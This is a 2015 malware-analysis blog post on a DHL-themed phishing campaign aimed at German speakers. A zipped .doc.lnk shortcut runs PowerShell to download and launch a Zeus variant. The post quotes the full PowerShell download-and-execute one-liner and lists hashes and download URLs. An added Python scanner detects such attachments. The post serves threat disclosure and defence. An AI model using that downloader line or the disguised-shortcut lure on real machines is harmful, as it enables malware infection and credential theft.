2015-11-19

DHL themed Zeus campaign is using Powershell as malware downloader

Hello,
I have spotted a DHL-themed phishing campaign using PowerShell as a malware downloader. Here are some samples of the malicious downloader attachment from the phishing email:

https://malwr.com/analysis/YTlhOGRmNTNlYzQzNGIzNTg0ZTZiOTFkNDg1OGI1Nzc/
https://malwr.com/analysis/ZmU0MjliNzNhYmRlNDE1YmE4ZGQ3NWIyNzAxMzQzNzE/

The attachment has the extension *.doc.zip (to look like a zipped document), and inside there is a *.doc.lnk file.
Instead of an MS Office document there is a Windows shortcut (.lnk), but normal users will most probably see only ".doc", because the common setting on Windows is to hide extensions of known file types. The link file points to the PowerShell binary and has the download script as a command-line parameter.

PowerShell downloader example:
(New-Object System.Net.WebClient).DownloadFile('hxxp://nov01mail.pw/bot.exe','%temp%\l.exe');(New-Object -com Shell.Application).ShellExecute('%temp%\l.exe');!%SystemRoot%\system32\SHELL32.dll
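
A mail-gateway style check for the attachment layout described above, written as an added example that is not part of the original post: it lists .lnk members of a zip, flags document-style double extensions, and searches the shortcut bytes for the strings seen in the downloader command line. The file name, size cap, extension list and sample attachment are constructed assumptions.

```python
import io
import re
import zipfile

# Shell Link header: HeaderSize 0x4C followed by the LinkCLSID.
LNK_MAGIC = bytes.fromhex("4c0000000114020000000000c000000000000046")
# Document-style extension followed by .lnk, e.g. "name.doc.lnk".
DOUBLE_EXT = re.compile(r"\.(docx?|xlsx?|pdf|rtf|txt)\.lnk$", re.I)
# Strings taken from the downloader command line quoted in the post.
KEYWORDS = ("powershell", "net.webclient", "downloadfile", "shellexecute")
MAX_LNK_SIZE = 1024 * 1024  # assumed cap; real shortcuts are a few KB


def lnk_keywords(data):
    """Return downloader keywords found in a shortcut's raw bytes."""
    if not data.startswith(LNK_MAGIC):
        return []
    # LNK strings are ANSI or UTF-16LE; dropping NULs lets one ASCII
    # search match both, whatever the byte alignment.
    flat = data.replace(b"\x00", b"").lower()
    return [k for k in KEYWORDS if k.encode() in flat]


def scan_zip(blob):
    """Return one finding per .lnk member of a zip attachment (bytes)."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            name = info.filename
            if not name.lower().endswith(".lnk"):
                continue
            oversized = info.file_size > MAX_LNK_SIZE
            hits = [] if oversized else lnk_keywords(zf.read(info))
            findings.append({"name": name, "oversized": oversized,
                             "double_extension": bool(DOUBLE_EXT.search(name)),
                             "keywords": hits})
    return findings


def build_sample():
    """Constructed attachment: fake .doc.lnk with a defanged command line."""
    args = "(New-Object System.Net.WebClient).DownloadFile('hxxp://example.invalid/x','%temp%\\l.exe')"
    lnk = LNK_MAGIC + b"\x00" * 56 + b"powershell.exe" + args.encode("utf-16-le")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("DHL_Paket.doc.lnk", lnk)  # constructed file name
        zf.writestr("readme.txt", b"benign")
    return buf.getvalue()
```

Any .lnk inside an inbound archive is worth quarantining on its own; the double-extension and keyword fields only help with triage.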

The phishing email targets German-speaking victims. Sample emails here:
http://www.trojaner-board.de/172090-gefaelschte-dhl-email-schaedliche-infektion.html
http://www.netzwelt.de/news/155327-vorsicht-dhl-virus-neue-spam-welle-trojaner-anhang.html
http://phishing-mails.blogspot.co.uk/2015/10/dhl-paket-angekommen.html
http://blog.botfrei.de/2015/10/erneute-dhl-spamwelle-erreicht-unsere-rechner/



These IPs seem to be serving as the download sites for the malware (or were at some point in time):

Download sites:

Some samples - unfortunately the malware detection from AV vendors is quite inconclusive on the malware family, but according to abuse.ch it is some modified version of Zeus, so hopefully these will get tracked by ZeusTracker.abuse.ch at some point:

I was able to obtain these 3 samples and run them through malwr.com:
ccb86eccbde7683410910adf09bc0a62
        from hxxp://masterlin788[.]pw/bot.exe
        https://malwr.com/analysis/ZjhiMmVkZjI3NGU3NGM1MGFlNzVjZDY0M2Y0NzcxMjI/
        https://www.hybrid-analysis.com/sample/f8ab572c3a395812147faed7fef2c688c0c2b3d06c0074ade741ad4d51fd870c/?environmentId=1

d0c2e2a48459ea52cc0e42e15c995ee2
        from hxxp://nov19mailmarketing[.]pw/bot.exe
        https://malwr.com/analysis/YWNjYWY1NDk5MjAxNGNjYWFiMDEwNTRhNzNmODY0NTk/
        https://www.hybrid-analysis.com/sample/6bbb45a9784a0b83f077d6a9d4a7e89d07ddd79a9f8b5d605aad3ab0855d9655?environmentId=1

1a482869a04f9bfe1a557ec391f5df57
        from hxxp://supportsoft777[.]pw/bot.exe
        https://malwr.com/analysis/YWY3NTZlYjg1NzJjNGFmYjliNDU2NmFhNDBmNjFhYjc/